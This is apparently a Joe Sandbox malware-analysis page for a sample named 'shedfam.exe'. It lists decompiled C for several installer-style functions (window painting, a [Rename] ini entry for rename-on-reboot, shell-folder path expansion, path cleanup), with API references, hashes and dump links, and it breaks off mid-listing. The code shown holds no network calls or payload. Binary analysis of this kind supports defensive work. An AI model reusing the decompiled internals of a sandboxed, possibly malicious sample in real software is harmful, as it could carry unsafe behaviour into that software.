Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: /B$N$open
API String ID: 3615053054-636633259
Opcode ID: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
Instruction ID: 4ef5deaae8a6f16a89100f2c462af89a3ec6633dbf44de90af8596516ef02dbc
Opcode Fuzzy Hash: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
Instruction Fuzzy Hash: 85619FB1A40209BBEB109F60DD45F6A7B79FB44715F108036FB05BA2D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f90;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423f88;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00423780,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
Instruction ID: 5ee0eae5ae25bcf212c08558168c62b52fbe6696795006813c9da87f91bafb02
Opcode Fuzzy Hash: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
Instruction Fuzzy Hash: 00419A71804249AFCB058F94DD459AFBBB9FF44315F00812AF961AA2A0C738AA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405A49 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00405A49(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00406087(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x424010 =  *0x424010 + 1;
						return _t20;
					}
				}
				 *0x422710 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422188, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d88, "%s=%s\r\n", 0x422710, 0x422188);
						_t56 = _t55 + 0x10;
						E00405D1D(_t43, 0x400, 0x422188, 0x422188,  *((intOrPtr*)( *0x423f90 + 0x128)));
						_t20 = E004059D2(0x422188, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405947(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405947(_t26 + 0xa, 0x409424);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405993(_t51 + _t29, 0x421d88, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405CFB(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004059D2(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422710, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x00405a4f
0x00405a56
0x00405a5a
0x00405a63
0x00405a67
0x00405ba6
0x00405ba6
0x00000000
0x00405ba6
0x00405a67
0x00405a73
0x00405a89
0x00405ab1
0x00405abc
0x00405ac0
0x00405ae0
0x00405ae7
0x00405af1
0x00405afe
0x00405b03
0x00405b08
0x00405b0c
0x00000000
0x00000000
0x00405b1b
0x00405b1d
0x00405b2a
0x00405b2e
0x00405b9f
0x00405ba0
0x00000000
0x00405b4a
0x00405b57
0x00405bbc
0x00405bc3
0x00405b6a
0x00405b6a
0x00405b6c
0x00405b75
0x00405b80
0x00405b92
0x00405b99
0x00000000
0x00405b99
0x00405bc5
0x00405bc6
0x00405bcb
0x00405bcd
0x00405bda
0x00405bda
0x00405bde
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bcf
0x00405bcf
0x00405bd2
0x00405bd5
0x00405bd6
0x00000000
0x00405bcf
0x00405b62
0x00405b67
0x00000000
0x00405b67
0x00405b2e
0x00405a8b
0x00405a96
0x00405a9f
0x00405aa3
0x00000000
0x00000000
0x00405aa3
0x00405bb0

APIs

Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004057DE,?,00000000,000000F1,?), ref: 00405A96
GetShortPathNameA.KERNEL32 ref: 00405A9F
GetShortPathNameA.KERNEL32 ref: 00405ABC
wsprintfA.USER32 ref: 00405ADA
GetFileSize.KERNEL32(00000000,00000000,00422188,C0000000,00000004,00422188,?,?,?,00000000,000000F1,?), ref: 00405B15
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B24
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B3A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D88,00000000,-0000000A,00409424,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405B80
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405B92
GlobalFree.KERNEL32 ref: 00405B99
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BA0

Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E

Strings

%s=%s, xrefs: 00405AD0
[Rename], xrefs: 00405B4A, 00405B5C

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3445103937-1727408572
Opcode ID: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
Instruction ID: d3b858f9c50fd1002edea1203351e8dfee5eb830211114c78627ca8ef1b38bc0
Opcode Fuzzy Hash: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
Instruction Fuzzy Hash: 2B41FF71A45A15BBD7206B619D49F6B3AACEF80754F140436FE05F22C2E67CBC018EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D1D Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405D1D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42375c - 4 + _t36 * 4);
				}
				_t74 =  *0x423fb8 + _t36;
				_t37 = 0x422f20;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422f20;
				if(_a4 - 0x422f20 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405D1D(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422f20;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405CFB(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405C59(_t86,  *0x423f88);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405F5D(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x424004;
						if( *0x424004 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f84;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423fb8;
							E00405BE2(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423fb8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405D1D(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405CFB(_a4, _t37);
			}

0x00405d1d
0x00405d1d
0x00405d1d
0x00405d23
0x00405d28
0x00405d39
0x00405d39
0x00405d44
0x00405d46
0x00405d4b
0x00405d4e
0x00405d4f
0x00405d56
0x00405d58
0x00405d5e
0x00405d61
0x00405d61
0x00405f3a
0x00405f3a
0x00405f3e
0x00000000
0x00000000
0x00405d6e
0x00405d74
0x00000000
0x00000000
0x00405d7a
0x00405d7b
0x00405d7e
0x00405d81
0x00405f2d
0x00405f37
0x00405f39
0x00405f39
0x00405f2f
0x00405f31
0x00405f33
0x00405f34
0x00405f34
0x00000000
0x00405f2d
0x00405d87
0x00405d8b
0x00405d9b
0x00405d9f
0x00405da6
0x00405da9
0x00405dad
0x00405db3
0x00405db6
0x00405db9
0x00405dbc
0x00405ed7
0x00405eda
0x00405f0a
0x00405f0d
0x00405f12
0x00405f16
0x00405f16
0x00405f1b
0x00405f1c
0x00405f21
0x00405f24
0x00405f26
0x00000000
0x00405f26
0x00405edc
0x00405edf
0x00405ef4
0x00405efb
0x00405ee1
0x00405ee8
0x00405ee8
0x00405f03
0x00405f06
0x00405ecf
0x00405ed0
0x00405ed0
0x00000000
0x00405f06
0x00405dc4
0x00405dc5
0x00405dcb
0x00405dcd
0x00405de7
0x00405de7
0x00405dee
0x00405dee
0x00405df5
0x00405df9
0x00405df9
0x00405dfa
0x00405dfc
0x00405e35
0x00405e38
0x00405e48
0x00405e4b
0x00405e53
0x00405e59
0x00405e59
0x00405eb5
0x00405eb5
0x00405eb7
0x00000000
0x00000000
0x00405e5d
0x00405e64
0x00405e65
0x00405e67
0x00405e81
0x00405e8f
0x00405e95
0x00405e97
0x00405eb2
0x00405eb2
0x00405eb2
0x00000000
0x00405eb2
0x00405e9d
0x00405ea8
0x00405eae
0x00405eb0
0x00000000
0x00000000
0x00000000
0x00405eb0
0x00405e69
0x00405e6c
0x00000000
0x00000000
0x00405e7b
0x00405e7d
0x00405e7f
0x00000000
0x00000000
0x00000000
0x00405e7f
0x00000000
0x00405eb5
0x00405e40
0x00000000
0x00405dfe
0x00405e03
0x00405e19
0x00405e1e
0x00405e21
0x00405ebe
0x00405ebe
0x00405ec2
0x00405eca
0x00405eca
0x00000000
0x00405ec2
0x00405e2b
0x00405eb9
0x00405eb9
0x00405ebc
0x00000000
0x00000000
0x00000000
0x00405ebc
0x00405dfc
0x00405dcf
0x00405dd3
0x00000000
0x00000000
0x00405dd5
0x00405dd9
0x00000000
0x00000000
0x00405ddb
0x00405ddf
0x00000000
0x00405de1
0x00405de1
0x00000000
0x00405de1
0x00405ddf
0x00405f44
0x00405f4e
0x00405f5a
0x00405f5a
0x00000000

APIs

GetVersion.KERNEL32(?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405DC5
GetSystemDirectoryA.KERNEL32 ref: 00405E40
GetWindowsDirectoryA.KERNEL32(00422F20,00000400), ref: 00405E53
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8F
SHGetPathFromIDListA.SHELL32(00000000,00422F20), ref: 00405E9D
CoTaskMemFree.OLE32(00000000), ref: 00405EA8
lstrcatA.KERNEL32(00422F20,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ECA
lstrlenA.KERNEL32(00422F20,?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405F1C

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E0F
/B, xrefs: 00405F26
/B, xrefs: 00405D46
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EC4

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: /B$ /B$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1912783298
Opcode ID: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
Instruction ID: bc679195f81621fcb390d0e71ed0d7b45f11abfd0e51c03931a277fa57cc5d3e
Opcode Fuzzy Hash: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
Instruction Fuzzy Hash: A051F471A04A02ABEB256F24DC847BB3B74DB55315F50823BE991B62D0D33C4A42DF8E

Uniqueness

Uniqueness Score: -1.00%

Function 00405F5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F5D(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040585B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405819("*?|<>/\":", _t5))) == 0) {
							E00405993(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405f5f
0x00405f67
0x00405f7b
0x00405f7b
0x00405f81
0x00405f8e
0x00405f8e
0x00405f8f
0x00405f91
0x00405f95
0x00405f97
0x00405fa0
0x00405fa2
0x00405fbc
0x00405fc4
0x00405fc4
0x00405fc9
0x00405fcb
0x00405fcd
0x00405fd1
0x00405fd2
0x00405fd5
0x00405fdd
0x00405fdf
0x00405fe3
0x00000000
0x00000000
0x00405fe9
0x00405fee
0x00000000
0x00000000
0x00000000
0x00405fee
0x00405ff3

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\shedfam.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
CharNextA.USER32(?,"C:\Users\user\Desktop\shedfam.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7

Strings

"C:\Users\user\Desktop\shedfam.exe", xrefs: 00405F99
*?|<>/":, xrefs: 00405FA5
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F5E, 00405F63

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\shedfam.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4272030048
Opcode ID: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
Instruction ID: afd4a01125e034af7a3871a1a8bdb924777211b2e54028c3170dd0334d944cbd
Opcode Fuzzy Hash: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
Instruction Fuzzy Hash: 7111B251808B962DEB3216384C44B777F9DCB967A0F5844BBE9C5722C2C67C9C438B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040401E Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040401E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00404030
0x004040c4
0x00000000
0x004040c4
0x00404041
0x00404045
0x00000000
0x00000000
0x0040404b
0x00404054
0x00404057
0x00404057
0x0040405d
0x00404063
0x00404063
0x0040406f
